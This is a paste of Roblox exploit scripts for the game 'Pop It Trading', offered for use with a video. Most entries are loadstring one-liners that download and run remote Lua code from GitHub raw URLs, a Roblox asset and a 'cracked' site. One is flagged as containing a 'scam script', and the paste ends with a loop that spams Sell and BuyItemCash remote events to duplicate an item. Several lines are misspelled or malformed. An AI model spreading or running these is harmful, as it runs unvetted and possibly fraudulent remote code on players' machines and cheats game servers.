PLEASE READ CAREFULLY IF DONT WORK
_________________________________

I'm sorry if the script gets patched                   | THERE IS LOTS OF SCRIPTS DON'T
or i copy type the script on the video wrong           |COPY THEM ALL CHOOSE
More scripts and discord scripts leaking soon          | ONE ONLY
______________________________________________
HAH I JUST LEAKED SOME DISCORD SCRIPTS TO PEOPLE!!!!
____________________________________________________

Discord scripts:
_________________

Script 1:   loadstring(game:GetObjects("rbsassetid://9571633145")[1].Source()


Script 2:   loadstring(game:HttpGet("https://raw.githubusercontent.com/AXSHUB/popitscriptbu/main/Popittrading2.txt"))()


Script 3:   loadstring(gameHttpGet("https://raw.githubusercontent.com/Basbousa1/my-roblox-scripts/main/Roblox-PopItTraiding%20script.lua"))()


Script 4:   loadstring(game:HttpGet(("https://thekillerhood.xyz/cracked/CRACKEDBYKILLERHOOD"),true))()


Script 5:   loadstring(game:GetObjects("rbxassetid://9571633145")[1].Source)()


Script 6:   loadstring(game:HttpGet("https://raw.githubusercontent.com/Secrethumanbepro/Secrethumanbepro/main/Pov%20v2"))()
____________________________________________________________________________________________________________________
Basic Scripts:

Basic Script 1:   loadstring(game:HttpGet(("https://raw.githubusercontent.com/RTHRTHTH3R34/POP-IT-TRADING-GO/main/README.md"), true))()
(Has scam script the red one)

Basic Script 2:   loadstring(game:HttpGet("https://raw.githubusercontent.com/Secrethumanbepro/Secrethumanbepro/main/Pov",true))()
(The green one)

Basic Script 3:
loadstring(game:HttpGet("https://raw.githubusercontent.com/Basbousa1/my-roblox-scripts/main/Roblox-PopItTrading%20script.lua"))()
(The purple one)
_________________
THE FAST DUPING BANANA:
_________________________
while wait(0.34) do

local args = {
    [1] = "The banana"
}

game:GetService("ReplicatedStorage").RemoteEvents.Sell:FireServer(unpack(args))

local args = {
    [1] = "The banana"
}

game:GetService("ReplicatedStorage").RemoteEvents.BuyItemCash:FireServer(unpack(args))
end
